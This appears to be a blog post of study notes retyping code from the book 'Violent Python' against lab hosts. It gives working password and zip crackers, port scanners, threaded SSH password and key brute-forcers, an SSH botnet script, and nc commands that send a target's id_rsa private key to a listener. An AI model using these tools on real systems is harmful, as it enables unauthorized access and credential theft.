Study Notes on Violent Python (《Python绝技:运用Python成为顶级黑客》)

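In this post I type out the code from 《Python绝技:运用Python成为顶级黑客》, learn the programming techniques and thinking behind Python security tooling, and modify the code where the situation calls for it.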

Chapter 1: Getting Started

1. Setting Up the Development Environment

Installing third-party libraries:

Install the python-nmap package:

wget http://xael.org/norman/python/python-nmap/python-nmap-0.2.4.tar.gz -O nmap.tar.gz

tar -xzf nmap.tar.gz

cd python-nmap-0.2.4/

python setup.py install

Alternatively, easy_install makes the installation simpler: easy_install python-nmap

Install the other packages: easy_install pyPdf python-nmap pygeoip mechanize BeautifulSoup4

A few Bluetooth-related libraries cannot be installed with easy_install; install them with: apt-get install python-bluez bluetooth python-obexftp

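Interpreted Python versus interactive Python:

Put simply, interpreted mode means invoking the Python interpreter to execute a .py script, while interactive mode means typing python on the command line and entering statements at the prompt.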

2. The Python Language



Variables

Python variables can hold strings, integers, lists, Booleans, and dictionaries.



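Strings

Four methods: upper() returns the upper-case form, lower() returns the lower-case form, replace() substitutes a substring, and find() returns the index of a substring.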


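The four string methods can be tried on any string. The sketch below is written for Python 3 (the notes themselves use Python 2), and the `banner` value is a made-up sample rather than output from a real server.

```python
# Python 3 sketch; `banner` is a made-up sample string.
banner = "FreeFloat FTP Server"

upper_banner = banner.upper()                      # new string, all upper case
lower_banner = banner.lower()                      # new string, all lower case
replaced = banner.replace("FreeFloat", "Ability")  # new string with the substitution
position = banner.find("FTP")                      # index of the first match
missing = banner.find("SSH")                       # find() returns -1 when absent

print(upper_banner)
print(lower_banner)
print(replaced)
print(position, missing)
```

Strings are immutable, so each method returns a new string and leaves `banner` unchanged.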

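Lists

append() adds an element to the list, index() returns an element's index, remove() deletes an element, and sort() sorts the list in place; the built-in len() function returns the list's length.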


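A short Python 3 sketch of the list operations listed above, using an arbitrary list of port numbers chosen only for illustration:

```python
# Python 3 sketch; the port numbers are arbitrary sample values.
ports = []
for p in (80, 21, 443, 25):
    ports.append(p)        # add elements one at a time

idx = ports.index(443)     # position of 443 before any reordering
ports.remove(25)           # delete the first element equal to 25
ports.sort()               # sort in place, ascending
count = len(ports)         # len() is a built-in function, not a list method

print(ports, idx, count)
```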

Dictionaries

keys() returns a list of all keys in the dictionary; items() returns a list of all (key, value) pairs.




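A minimal Python 3 sketch of keys() and items(). The `services` dictionary is a made-up example. One difference from the Python 2 used in these notes: in Python 3 both methods return view objects, so the sketch wraps them in list().

```python
# Python 3 sketch; `services` is a made-up example dictionary.
services = {"ftp": 21, "ssh": 22, "smtp": 25}

names = list(services.keys())    # wrap the view in list() to get a real list
pairs = list(services.items())   # list of (key, value) tuples

print(names)
print(pairs)
print(services["ssh"])           # look up a single value by key
```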

Networking

Using the socket module, connect() opens a network connection to the given IP address and port, and recv(1024) reads up to the next 1024 bytes from the socket.
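To try connect() and recv() without touching a real host, the Python 3 sketch below starts a throwaway server on the loopback interface and reads its banner. The helper names `serve_banner` and `grab_banner` and the banner text are assumptions made up for this illustration.

```python
import socket
import threading

def serve_banner(server_sock, banner):
    """Accept one connection, send a banner, then close (stand-in for a real service)."""
    conn, _addr = server_sock.accept()
    conn.sendall(banner)
    conn.close()

def grab_banner(ip, port, timeout=2.0):
    """Connect to ip:port and return up to 1024 bytes, or None on failure."""
    s = socket.socket()
    s.settimeout(timeout)
    try:
        s.connect((ip, port))
        return s.recv(1024)
    except OSError:
        return None
    finally:
        s.close()

# Bind to port 0 so the OS picks a free port on the loopback interface.
server = socket.socket()
server.bind(("127.0.0.1", 0))
server.listen(1)
port = server.getsockname()[1]

t = threading.Thread(target=serve_banner, args=(server, b"220 demo FTP ready\r\n"))
t.start()

banner = grab_banner("127.0.0.1", port)
t.join()
server.close()
print(banner)
```

In Python 3 recv() returns bytes rather than str, so substring checks against a banner need bytes literals or an explicit decode().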

Conditional Statements

if condition_1:
    statement_1
elif condition_2:
    statement_2
else:
    statement_3



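Exception Handling

Use try/except for exception handling. The exception can be bound to a variable e so that it can be printed; call str() to convert e to a string.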
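A minimal Python 3 sketch of the pattern: catch the exception, bind it to e, and turn it into a string. The function name `safe_divide` is hypothetical.

```python
def safe_divide(a, b):
    """Return a / b, or an error string if the division raises."""
    try:
        return a / b
    except Exception as e:           # Python 2 code in these notes writes "except Exception, e"
        return "[-] Error = " + str(e)

print(safe_divide(4, 2))
print(safe_divide(1337, 0))
```

The `except Exception as e` spelling works in both Python 2.6+ and Python 3, while the comma form is Python 2 only.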

Functions



Functions are defined with the def keyword. The example defines a function that grabs an FTP banner:

#!/usr/bin/python
#coding=utf-8
import socket

def retBanner(ip,port):
    try:
        socket.setdefaulttimeout(2)
        s = socket.socket()
        s.connect((ip,port))
        banner = s.recv(1024)
        return banner
    except:
        return

def checkVulns(banner):
    if 'vsFTPd' in banner:
        print '[+] vsFTPd is vulnerable.'
    elif 'FreeFloat Ftp Server' in banner:
        print '[+] FreeFloat Ftp Server is vulnerable.'
    else:
        print '[-] FTP Server is not vulnerable.'
    return

def main():
    ips = ['10.10.10.128','10.10.10.160']
    port = 21
    banner1 = retBanner(ips[0],port)
    if banner1:
        print '[+] ' + ips[0] + ": " + banner1.strip('\n')
        checkVulns(banner1)
    banner2 = retBanner(ips[1],port)
    if banner2:
        print '[+] ' + ips[1] + ": " + banner2.strip('\n')
        checkVulns(banner2)

if __name__ == '__main__':
    main()

Iteration

The for statement

#!/usr/bin/python

#coding=utf-8

import socket

def retBanner(ip,port):

try:

socket.setdefaulttimeout(2)

s = socket.socket()

s.connect((ip,port))

banner = s.recv(1024)

return banner

except:

return

def checkVulns(banner):

if 'vsFTPd' in banner:

print '[+] vsFTPd is vulnerable.'

elif 'FreeFloat Ftp Server' in banner:

print '[+] FreeFloat Ftp Server is vulnerable.'

else:

print '[-] FTP Server is not vulnerable.'

return

def main():

portList = [21,22,25,80,110,443]

ip = '10.10.10.128'

for port in portList:

banner = retBanner(ip,port)

if banner:

print '[+] ' + ip + ':' + str(port) + '--' + banner

if port == 21:

checkVulns(banner)

if __name__ == '__main__':

main()

File Input/Output

open() opens a file. Modes: r read-only, r+ read and write, w create (overwriting any existing file), a append, b binary.



In the same directory:

In a different directory:



To search downward from the current directory, prefix the path with a dot (.).



An absolute path needs no leading dot, because it does not start from the current directory.


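The open() modes described in this section can be exercised in a temporary directory. This is a Python 3 sketch, and the file name `vuln_banners.txt` is a hypothetical example.

```python
import os
import tempfile

workdir = tempfile.mkdtemp()
path = os.path.join(workdir, "vuln_banners.txt")   # hypothetical file name

with open(path, "w") as f:       # "w": create the file, truncating any old content
    f.write("vsFTPd 2.3.4\n")

with open(path, "a") as f:       # "a": append to the end of the file
    f.write("FreeFloat Ftp Server\n")

with open(path, "r") as f:       # "r": read-only text mode
    lines = [line.strip("\n") for line in f]

with open(path, "rb") as f:      # "b" added to a mode reads raw bytes
    raw = f.read()

print(lines)
print(type(raw))
```

Using `with` closes the file automatically, which the open()/readlines() style in the notes leaves to the interpreter.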

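The sys module

The sys.argv list holds all command-line arguments: sys.argv[0] is the name of the Python script, and the remaining items are the arguments passed to it.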
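A small Python 3 sketch of how the sys.argv layout is usually unpacked. The helper `split_argv` and the sample argument list are made up for illustration, so the function can be tried without launching a script from the shell.

```python
import sys

def split_argv(argv):
    """Split an argv-style list into (script name, list of parameters)."""
    script_name = argv[0]
    params = argv[1:]
    return script_name, params

# A hand-written list standing in for what sys.argv would contain.
script, params = split_argv(["vuln-scanner.py", "vuln-banners.txt"])
print(script, params)

# The real list for the current process:
print(len(sys.argv) >= 1)
```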

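The os module

os.path.isfile() checks whether the path exists and is a regular file.

os.access() with os.R_OK checks whether the current user has permission to read the file.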

#!/usr/bin/python
#coding=utf-8
import sys
import os

if len(sys.argv) == 2:
    filename = sys.argv[1]
    if not os.path.isfile(filename):
        print '[-] ' + filename + ' does not exist.'
        exit(0)
    if not os.access(filename,os.R_OK):
        print '[-] ' + filename + ' access denied.'
        exit(0)
    print '[+] Reading From: ' + filename



Putting It Together

Combining the pieces above gives a scanner that checks a target host's ports and their banners:

#!/usr/bin/python

#coding=utf-8

import socket

import sys

import os

def retBanner(ip,port):

try:

socket.setdefaulttimeout(2)

s = socket.socket()

s.connect((ip,port))

banner = s.recv(1024)

return banner

except:

return

def checkVulns(banner,filename):

f = open(filename, 'r')

for line in f.readlines():

if line.strip('\n') in banner:

print '[+] Server is vulnerable: ' + banner.strip('\n')

def main():

if len(sys.argv) == 2:

filename = sys.argv[1]

if not os.path.isfile(filename):

print '[-] ' + filename + ' does not exist.'

exit(0)

if not os.access(filename,os.R_OK):

print '[-] ' + filename + ' access denied.'

exit(0)

print '[+] Reading From: ' + filename

else:

print '[-] Usage: ' + str(sys.argv[0]) + ' <vuln filename>'

exit(0)

portList = [21,22,25,80,110,443]

ip = '10.10.10.128'

for port in portList:

banner = retBanner(ip,port)

if banner:

print '[+] ' + ip + ':' + str(port) + '--' + banner

if port == 21:

checkVulns(banner,filename)

if __name__ == '__main__':

main()



Output:

3. Your First Python Programs



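First program: a Unix password cracker

This program reads two files: one containing the encrypted passwords and one containing the dictionary of guesses. testPass() reads the dictionary file and hashes each word with crypt.crypt(), which takes a plaintext password and a two-character salt, then compares the result with the stored hash.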



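First, a crypt example:

The salt is stored as the first two characters of the hash, so the first two characters of the stored hash can be taken as the salt.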
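The salt extraction can be shown without calling crypt at all. In the Python 3 sketch below, the helper name `split_password_entry` and the sample line (including its hash value) are made-up placeholders, not real credentials.

```python
def split_password_entry(line):
    """Return (user, crypt_hash, salt) for a 'user:hash:...' line, or None."""
    if ":" not in line:
        return None
    fields = line.strip().split(":")
    user = fields[0]
    crypt_hash = fields[1].strip()
    salt = crypt_hash[0:2]          # traditional crypt: the salt is the first two characters
    return user, crypt_hash, salt

# Placeholder entry; the hash text is invented for the example.
entry = "alice:abJnggxhB/yWI:1000:100:Alice:/home/alice:/bin/sh\n"
print(split_password_entry(entry))
print(split_password_entry("a line without fields"))
```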

#!/usr/bin/python
#coding=utf-8
import crypt

def testPass(cryptPass):
    #The first two characters of the stored hash are the salt
    salt = cryptPass[0:2]
    dictFile = open('dictionary.txt','r')
    for word in dictFile.readlines():
        word = word.strip('\n')
        cryptWord = crypt.crypt(word,salt)
        if cryptWord == cryptPass:
            print '[+] Found Password: ' + word + "\n"
            return
    print '[-] Password not Found.\n'
    return

def main():
    passFile = open('passwords.txt')
    for line in passFile.readlines():
        if ":" in line:
            user = line.split(':')[0]
            cryptPass = line.split(':')[1].strip(' ')
            print '[*] Cracking Password For : ' + user
            testPass(cryptPass)

if __name__ == '__main__':
    main()

Output:



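Modern Unix-like systems store password hashes in /etc/shadow, and mostly use stronger algorithms such as SHA-512, for example:

Python's hashlib library provides SHA-512 functions, so the script can be upgraded further to crack such passwords.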
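As a starting point, the Python 3 sketch below shows the hashlib call itself. The input strings are arbitrary samples. One caveat worth stating: shadow entries that begin with `$6$` use a SHA-512-based crypt scheme with a salt and many rounds, so a single bare SHA-512 digest like the ones here will not match a shadow entry directly.

```python
import hashlib

# hashlib works on bytes, so the sample strings are bytes literals.
digest = hashlib.sha512(b"password").hexdigest()
salted = hashlib.sha512(b"salt" + b"password").hexdigest()

print(len(digest))        # a SHA-512 digest is 64 bytes, i.e. 128 hex characters
print(digest == salted)   # prepending a salt changes the digest
```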

Second program: a Zip file password cracker

The main call is the extractall() method of the zipfile library, whose pwd parameter specifies the password.

#!/usr/bin/python
#coding=utf-8
import zipfile
import optparse
from threading import Thread

def extractFile(zFile,password):
    try:
        #extractall() raises an exception when the password is wrong
        zFile.extractall(pwd=password)
        print '[+] Found Password : ' + password + '\n'
    except:
        pass

def main():
    parser = optparse.OptionParser("[*] Usage: ./unzip.py -f <zipfile> -d <dictionary>")
    parser.add_option('-f',dest='zname',type='string',help='specify zip file')
    parser.add_option('-d',dest='dname',type='string',help='specify dictionary file')
    (options,args) = parser.parse_args()
    if (options.zname == None) | (options.dname == None):
        print parser.usage
        exit(0)

    zFile = zipfile.ZipFile(options.zname)
    passFile = open(options.dname)
    #Try each dictionary word in its own thread
    for line in passFile.readlines():
        line = line.strip('\n')
        t = Thread(target=extractFile,args=(zFile,line))
        t.start()

if __name__ == '__main__':
    main()

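The code imports the optparse library to parse command-line arguments. OptionParser() creates an instance of the parser class, parser.add_option() declares which options to parse, and usage holds the help text for the arguments. Multiple threads are used to speed up cracking.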
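The optparse calls can be tried on their own by passing an explicit argument list to parse_args() instead of reading the real command line. This is a Python 3 sketch; the file names and the `<zipfile>`/`<dictionary>` placeholders in the usage string are assumptions for the example.

```python
import optparse

def build_parser():
    """Build a parser with the same two options the zip script declares."""
    parser = optparse.OptionParser("usage: %prog -f <zipfile> -d <dictionary>")
    parser.add_option("-f", dest="zname", type="string", help="specify zip file")
    parser.add_option("-d", dest="dname", type="string", help="specify dictionary file")
    return parser

parser = build_parser()

# Both options supplied.
options, args = parser.parse_args(["-f", "evil.zip", "-d", "dictionary.txt"])
print(options.zname, options.dname)

# An option that is not supplied is left as None.
partial, _ = parser.parse_args(["-f", "evil.zip"])
print(partial.dname)
```

optparse is still shipped with Python 3 but is no longer developed; argparse is the standard-library successor.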

Output:

Chapter 2: Penetration Testing with Python

1. Writing a Port Scanner

TCP full-connect scan and application banner grabbing

#!/usr/bin/python

#coding=utf-8

import optparse

import socket

from socket import *

def connScan(tgtHost,tgtPort):

try:

connSkt = socket(AF_INET,SOCK_STREAM)

connSkt.connect((tgtHost,tgtPort))

connSkt.send('ViolentPython\r\n')

result = connSkt.recv(100)

print '[+] %d/tcp open'%tgtPort

print '[+] ' + str(result)

connSkt.close()

except:

print '[-] %d/tcp closed'%tgtPort

def portScan(tgtHost,tgtPorts):

try:

tgtIP = gethostbyname(tgtHost)

except:

print "[-] Cannot resolve '%s' : Unknown host"%tgtHost

return

try:

tgtName = gethostbyaddr(tgtIP)

print '\n[+] Scan Results for: ' + tgtName[0]

except:

print '\n[+] Scan Results for: ' + tgtIP

setdefaulttimeout(1)

for tgtPort in tgtPorts:

print 'Scanning port ' + tgtPort

connScan(tgtHost,int(tgtPort))

def main():

parser = optparse.OptionParser("[*] Usage : ./portscanner.py -H <target host> -p <target port>")

parser.add_option('-H',dest='tgtHost',type='string',help='specify target host')

parser.add_option('-p',dest='tgtPort',type='string',help='specify target port[s]')

(options,args) = parser.parse_args()

tgtHost = options.tgtHost

tgtPorts = str(options.tgtPort).split(',')

if (tgtHost == None) | (options.tgtPort == None):

print parser.usage

exit(0)

portScan(tgtHost,tgtPorts)

if __name__ == '__main__':

main()

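This code takes its input from command-line arguments: the user supplies a host and the ports to scan, with multiple ports separated by commas. When both arguments are present, the scan function is called. Because str(None) yields the string 'None', testing the raw option value is the reliable way to detect a missing port argument; after str() and split(), the first list item is never None.

portScan() first calls gethostbyname() to resolve the host name to an IP address; if resolution fails, the function returns. Otherwise it calls gethostbyaddr() to look up the host name for that IP, printing the first item of the result (the host name) on success and the IP address on failure. It then iterates over the ports and calls connScan() for each one.

In connScan(), socket() is given two arguments, AF_INET and SOCK_STREAM, meaning IPv4 addressing and a TCP stream. These are the defaults, which is why the previous chapter's code worked without passing them. The rest of the code is much the same as before.

One small thing to note: the option parser already defines -h and --help to print usage information, so using -h for the host option causes a conflict. Use an upper-case -H instead, as the book does.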
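The comma-separated port argument can be parsed and validated in one small function. This Python 3 sketch is not the book's code; `parse_ports` is a hypothetical helper that also shows why a missing option needs to be checked before str() is applied.

```python
def parse_ports(port_arg):
    """Turn '21,22,80' into [21, 22, 80], skipping anything that is not a valid port."""
    if not port_arg:                 # covers None and the empty string
        return []
    ports = []
    for item in port_arg.split(","):
        item = item.strip()
        if item.isdigit() and 0 < int(item) < 65536:
            ports.append(int(item))
    return ports

print(parse_ports("21, 22,80"))
print(parse_ports("21,abc,70000"))
print(parse_ports(None))

# Applying str() to a missing option hides the None:
print(str(None).split(","))
```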



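Output:

Threaded Scanning

Modify the previous section's code to use threads. To give one function full control of the screen at a time, a semaphore is used: it blocks other threads and so prevents the garbled or out-of-order output that occurs when several threads print at once. Before printing, the code calls screenLock.acquire() to take the lock. If the semaphore is not yet held, the thread proceeds and prints to the screen; if it is held, the thread waits until the semaphore is released.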
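The locking pattern can be seen in isolation with threads that only record text. In this Python 3 sketch, the `report` function and the two-line message format are made up; a shared list stands in for the screen so the grouping can be inspected afterwards.

```python
import threading

screen_lock = threading.Semaphore(value=1)   # at most one thread "prints" at a time
output = []                                  # stands in for the screen

def report(port):
    """Append two related lines while holding the lock so they stay adjacent."""
    screen_lock.acquire()
    try:
        output.append("[+] %d/tcp open" % port)
        output.append("[+] banner for port %d" % port)
    finally:
        screen_lock.release()                # always release, even if an error occurs

threads = [threading.Thread(target=report, args=(p,)) for p in (21, 22, 80, 443)]
for t in threads:
    t.start()
for t in threads:
    t.join()

for line in output:
    print(line)
```

The order of the ports may differ from run to run, but the two lines belonging to one port always appear together.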

#!/usr/bin/python

#coding=utf-8

import optparse

import socket

from socket import *

from threading import *

#Define a semaphore

screenLock = Semaphore(value=1)

def connScan(tgtHost,tgtPort):

try:

connSkt = socket(AF_INET,SOCK_STREAM)

connSkt.connect((tgtHost,tgtPort))

connSkt.send('ViolentPython\r\n')

result = connSkt.recv(100)

#Acquire the lock

screenLock.acquire()

print '[+] %d/tcp open'%tgtPort

print '[+] ' + str(result)

except:

#Acquire the lock

screenLock.acquire()

print '[-] %d/tcp closed'%tgtPort

finally:

#Release the lock, then close the socket connection

screenLock.release()

connSkt.close()

def portScan(tgtHost,tgtPorts):

try:

tgtIP = gethostbyname(tgtHost)

except:

print "[-] Cannot resolve '%s' : Unknown host"%tgtHost

return

try:

tgtName = gethostbyaddr(tgtIP)

print '\n[+] Scan Results for: ' + tgtName[0]

except:

print '\n[+] Scan Results for: ' + tgtIP

setdefaulttimeout(1)

for tgtPort in tgtPorts:

t = Thread(target=connScan,args=(tgtHost,int(tgtPort)))

t.start()

def main():

parser = optparse.OptionParser("[*] Usage : ./portscanner.py -H <target host> -p <target port>")

parser.add_option('-H',dest='tgtHost',type='string',help='specify target host')

parser.add_option('-p',dest='tgtPort',type='string',help='specify target port[s]')

(options,args) = parser.parse_args()

tgtHost = options.tgtHost

tgtPorts = str(options.tgtPort).split(',')

if (tgtHost == None) | (options.tgtPort == None):

print parser.usage

exit(0)

portScan(tgtHost,tgtPorts)

if __name__ == '__main__':

main()



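Output:

The results show that with multiple threads the ports are no longer scanned in the order they were entered but concurrently. Because the semaphore serializes printing, the output is not garbled.

Port Scanning with nmap

If the module was not installed earlier, first download Python-Nmap from http://xael.org/pages/python-nmap-en.html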

#!/usr/bin/python

#coding=utf-8

import nmap

import optparse

def nmapScan(tgtHost,tgtPort):

#Create a PortScanner object

nmScan = nmap.PortScanner()

#Call PortScanner.scan() with the target and port to run the nmap scan

nmScan.scan(tgtHost,tgtPort)

#Print the port state from the scan result

state = nmScan[tgtHost]['tcp'][int(tgtPort)]['state']

print '[*] ' + tgtHost + " tcp/" + tgtPort + " " + state

def main():

parser=optparse.OptionParser("[*] Usage : ./nmapScan.py -H <target host> -p <target port>")

parser.add_option('-H',dest='tgtHost',type='string',help='specify target host')

parser.add_option('-p',dest='tgtPorts',type='string',help='specify target port[s]')

(options,args)=parser.parse_args()

tgtHost = options.tgtHost

tgtPorts = str(options.tgtPorts).split(',')

if (tgtHost == None) | (options.tgtPorts == None):

print parser.usage

exit(0)

for tgtPort in tgtPorts:

nmapScan(tgtHost,tgtPort)

if __name__ == '__main__':

main()

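Output:

2. Building an SSH Botnet with Python

Interacting with SSH through Pexpect

If Pexpect was not installed back in Chapter 1, download it first: https://pypi.python.org/pypi/pexpect/

The Pexpect module can interact with a program, wait for expected screen output, and respond differently depending on what appears.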



First, test a normal ssh connection:

Mimicking that flow, the code is:

#!/usr/bin/python
#coding=utf-8
import pexpect

#Prompt strings that may appear once the SSH session is established
PROMPT = ['# ','>>> ','> ','\$ ']

def send_command(child,cmd):
    #Send one command
    child.sendline(cmd)
    #Wait for a shell prompt
    child.expect(PROMPT)
    #Print everything received before the prompt
    print child.before

def connect(user,host,password):
    #Message shown when the host presents a key that is not yet known
    ssh_newkey = 'Are you sure you want to continue connecting'
    connStr = 'ssh ' + user + '@' + host
    #Spawn the ssh command as a pexpect child
    child = pexpect.spawn(connStr)
    #Expect the new-key message or a password prompt; otherwise time out
    ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
    #Timed out
    if ret == 0:
        print '[-] Error Connecting'
        return
    #Matched ssh_newkey
    if ret == 1:
        #Answer yes, then expect the password prompt
        child.sendline('yes')
        ret = child.expect([pexpect.TIMEOUT,'[P|p]assword: '])
        #Timed out
        if ret == 0:
            print '[-] Error Connecting'
            return
    #Send the password
    child.sendline(password)
    child.expect(PROMPT)
    return child

def main():
    host='10.10.10.128'
    user='msfadmin'
    password='msfadmin'
    child=connect(user,host,password)
    send_command(child,'uname -a')

if __name__ == '__main__':
    main()

This code neither takes command-line arguments nor provides an interactive shell.



Output:

The book mentions running this on BackTrack, so let's test that too:

On BT5, generate the SSH keys and start the SSH service:

sshd-generate

service ssh start

./sshScan.py

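[My modified code]

The code can be improved further. Below is my improved version, which takes its parameters from the command line and provides an interactive shell: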

#!/usr/bin/python
#coding=utf-8
import pexpect
from optparse import OptionParser

#Prompt strings that may appear once the SSH session is established
PROMPT = ['# ','>>> ','> ','\$ ']

def send_command(child,cmd):
    #Send one command
    child.sendline(cmd)
    #Wait for a shell prompt
    child.expect(PROMPT)
    #Print the line after the echoed command
    print child.before.split('\n')[1]

def connect(user,host,password):
    #Message shown when the host presents a key that is not yet known
    ssh_newkey = 'Are you sure you want to continue connecting'
    connStr = 'ssh ' + user + '@' + host
    #Spawn the ssh command as a pexpect child
    child = pexpect.spawn(connStr)
    #Expect the new-key message or a password prompt; otherwise time out
    ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
    #Timed out
    if ret == 0:
        print '[-] Error Connecting'
        return
    #Matched ssh_newkey
    if ret == 1:
        #Answer yes, then expect the password prompt
        child.sendline('yes')
        ret = child.expect([pexpect.TIMEOUT,ssh_newkey,'[P|p]assword: '])
        #Timed out
        if ret == 0:
            print '[-] Error Connecting'
            return
    #Send the password
    child.sendline(password)
    child.expect(PROMPT)
    return child

def main():
    parser = OptionParser("[*] Usage : ./sshCommand2.py -H <target host> -u <username> -p <password>")
    parser.add_option('-H',dest='host',type='string',help='specify target host')
    parser.add_option('-u',dest='username',type='string',help='target username')
    parser.add_option('-p',dest='password',type='string',help='target password')
    (options,args) = parser.parse_args()

    if (options.host == None) | (options.username == None) | (options.password == None):
        print parser.usage
        exit(0)

    child=connect(options.username,options.host,options.password)

    #Read commands in a loop and run each one on the remote host
    while True:
        command = raw_input(' ')
        send_command(child,command)

if __name__ == '__main__':
    main()



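Now the script can connect to a chosen target host over SSH and offers the same interactive command-line experience as SSH itself:

Brute-Forcing SSH Passwords with Pxssh

pxssh is a subclass of pexpect's spawn class that adds the login(), logout(), and prompt() methods. It makes SSH connections easy, without calling the more complex pexpect methods yourself.

The prompt(self,timeout=20) method matches the next shell prompt.

Rewriting the previous section's script with pxssh: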

#!/usr/bin/python
#coding=utf-8
from pexpect import pxssh

def send_command(s,cmd):
    s.sendline(cmd)
    #Match the prompt
    s.prompt()
    #Print everything received before the prompt
    print s.before

def connect(host,user,password):
    try:
        s = pxssh.pxssh()
        #Log in over SSH with pxssh's login() method
        s.login(host,user,password)
        return s
    except:
        print '[-] Error Connecting'
        exit(0)

s = connect('10.10.10.128','msfadmin','msfadmin')
send_command(s,'uname -a')

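At first I ran into a problem: typing import pxssh exactly as in the book raised an error even though the package was installed. It turns out that pxssh lives inside the pexpect package, so changing the line to from pexpect import pxssh fixes it.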



Output:

Next, continue modifying the code:

#!/usr/bin/python

#coding=utf-8

from pexpect import pxssh

import optparse

import time

from threading import *

maxConnections = 5

#Define a BoundedSemaphore, whose release() checks that the count does not exceed the upper bound

connection_lock = BoundedSemaphore(value=maxConnections)

Found = False

Fails = 0

def connect(host,user,password,release):

global Found

global Fails

try:

s = pxssh.pxssh()

#Log in over SSH with pxssh's login() method

s.login(host,user,password)

print '[+] Password Found: ' + password

Found = True

except Exception, e:

#The SSH server may be overwhelmed by connections; wait a while before retrying

if 'read_nonblocking' in str(e):

Fails += 1

time.sleep(5)

#Recursive call to connect(); it must not release the lock

connect(host,user,password,False)

#pxssh had trouble obtaining the command prompt; wait a while before retrying

elif 'synchronize with original prompt' in str(e):

time.sleep(1)

#Recursive call to connect(); it must not release the lock

connect(host,user,password,False)

finally:

if release:

#Release the lock

connection_lock.release()

def main():

parser = optparse.OptionParser('[*] Usage : ./sshBrute.py -H <target host> -u <username> -f <password file>')

parser.add_option('-H',dest='host',type='string',help='specify target host')

parser.add_option('-u',dest='username',type='string',help='target username')

parser.add_option('-f',dest='file',type='string',help='specify password file')

(options,args) = parser.parse_args()

if (options.host == None) | (options.username == None) | (options.file == None):

print parser.usage

exit(0)

host = options.host

username = options.username

file = options.file

fn = open(file,'r')

for line in fn.readlines():

if Found:

print '[*] Exiting: Password Found'

exit(0)

if Fails > 5:

print '[!] Exiting: Too Many Socket Timeouts'

exit(0)

#Acquire the lock

connection_lock.acquire()

#Strip the line ending: '\r\n' on Windows, '\n' on Linux

password = line.strip('\r').strip('\n')

print '[-] Testing: ' + str(password)

#This is not a recursive call to connect(), so the lock may be released

t = Thread(target=connect,args=(host,username,password,True))

child = t.start()

if __name__ =='__main__':

main()

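A semaphore is a thread-synchronization mechanism with a counter: release() increments the count, acquire() decrements it, and when the count is 0, acquire() blocks until release() is called. The threading library provides two kinds, Semaphore and BoundedSemaphore.

Semaphore: release() does not check whether the incremented count exceeds an upper bound (there is no bound, so the count can keep rising).

BoundedSemaphore: release() checks whether the incremented count would exceed the initial value and raises ValueError if it would, which keeps the count within bounds.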
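The difference between the two classes shows up when release() is called more often than acquire(). A minimal Python 3 sketch, with variable names chosen only for the example:

```python
import threading

# A plain Semaphore lets the counter grow past its initial value.
plain = threading.Semaphore(value=1)
plain.release()                                   # counter is now 2, no error
first = plain.acquire(blocking=False)             # succeeds, counter 1
second = plain.acquire(blocking=False)            # succeeds, counter 0
third = plain.acquire(blocking=False)             # fails: counter is already 0

# A BoundedSemaphore refuses to exceed its initial value.
bounded = threading.BoundedSemaphore(value=1)
try:
    bounded.release()                             # would raise the counter to 2
    over_release_detected = False
except ValueError:
    over_release_detected = True

print(first, second, third)
print(over_release_detected)
```

That check is why a bounded semaphore suits a connection limit: an accidental extra release() surfaces as an error instead of silently raising the limit.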



Output:



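Exploiting Weak SSH Keys

To log in over ssh with a key, the format is: ssh user@host -i keyfile -o PasswordAuthentication=no

The plan was to download the archive of SSH private keys from this site: http://digitaloffense.net/tools/debianopenssl/

However, the material is old and the site no longer offers the download.

For testing, I instead copied the RSA key file from the target machine over nc:

On Kali, start an nc listener first: nc -lp 4444 > id_rsa

Then on the Metasploitable target, change to the .ssh directory and send the private key file id_rsa (not the public key file):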

cd .ssh

nc -nv 10.10.10.160 4444 -q 1 < id_rsa

The script below tries each key in the specified directory in turn to make a connection.

#!/usr/bin/python

#coding=utf-8

import pexpect

import optparse

import os

from threading import *

maxConnections = 5

#Define a BoundedSemaphore, whose release() checks that the count does not exceed the upper bound

connection_lock = BoundedSemaphore(value=maxConnections)

Stop = False

Fails = 0

def connect(user,host,keyfile,release):

global Stop

global Fails

try:

perm_denied = 'Permission denied'

ssh_newkey = 'Are you sure you want to continue'

conn_closed = 'Connection closed by remote host'

opt = ' -o PasswordAuthentication=no'

connStr = 'ssh ' + user + '@' + host + ' -i ' + keyfile + opt

child = pexpect.spawn(connStr)

ret = child.expect([pexpect.TIMEOUT,perm_denied,ssh_newkey,conn_closed,'\$','#', ])

#Matched ssh_newkey

if ret == 2:

print '[-] Adding Host to ~/.ssh/known_hosts'

child.sendline('yes')

connect(user, host, keyfile, False)

#Matched conn_closed

elif ret == 3:

print '[-] Connection Closed By Remote Host'

Fails += 1

#Matched a shell prompt: '$' or '#'

elif ret > 3:

print '[+] Success. ' + str(keyfile)

Stop = True

finally:

if release:

#Release the lock

connection_lock.release()

def main():

parser = optparse.OptionParser('[*] Usage : ./sshBrute.py -H <target host> -u <username> -d <key directory>')

parser.add_option('-H',dest='host',type='string',help='specify target host')

parser.add_option('-u',dest='username',type='string',help='target username')

parser.add_option('-d',dest='passDir',type='string',help='specify directory with keys')

(options,args) = parser.parse_args()

if (options.host == None) | (options.username == None) | (options.passDir == None):

print parser.usage

exit(0)

host = options.host

username = options.username

passDir = options.passDir

#os.listdir() returns the names of all files and directories in the given directory

for filename in os.listdir(passDir):

if Stop:

print '[*] Exiting: Key Found.'

exit(0)

if Fails > 5:

print '[!] Exiting: Too Many Connections Closed By Remote Host.'

print '[!] Adjust number of simultaneous threads.'

exit(0)

#Acquire the lock

connection_lock.acquire()

#Join the directory and the file or directory name

fullpath = os.path.join(passDir,filename)

print '[-] Testing keyfile ' + str(fullpath)

t = Thread(target=connect,args=(username,host,fullpath,True))

child = t.start()

if __name__ =='__main__':

main()

Output:

Building the SSH Botnet

#!/usr/bin/python

#coding=utf-8

import optparse

from pexpect import pxssh

#Define a client class

class Client(object):

"""docstring for Client"""

def __init__(self, host, user, password):

self.host = host

self.user = user

self.password = password

self.session = self.connect()

def connect(self):

try:

s = pxssh.pxssh()

s.login(self.host,self.user,self.password)

return s

except Exception, e:

print e

print '[-] Error Connecting'

def send_command(self, cmd):

self.session.sendline(cmd)

self.session.prompt()

return self.session.before

def botnetCommand(command):

for client in botNet:

output = client.send_command(command)

print '[*] Output from ' + client.host

print '[+] ' + output + '\n'

def addClient(host, user, password):

client = Client(host,user,password)

botNet.append(client)

botNet = []

addClient('10.10.10.128','msfadmin','msfadmin')

addClient('10.10.10.153','root','toor')

botnetCommand('uname -a')

botnetCommand('whoami')

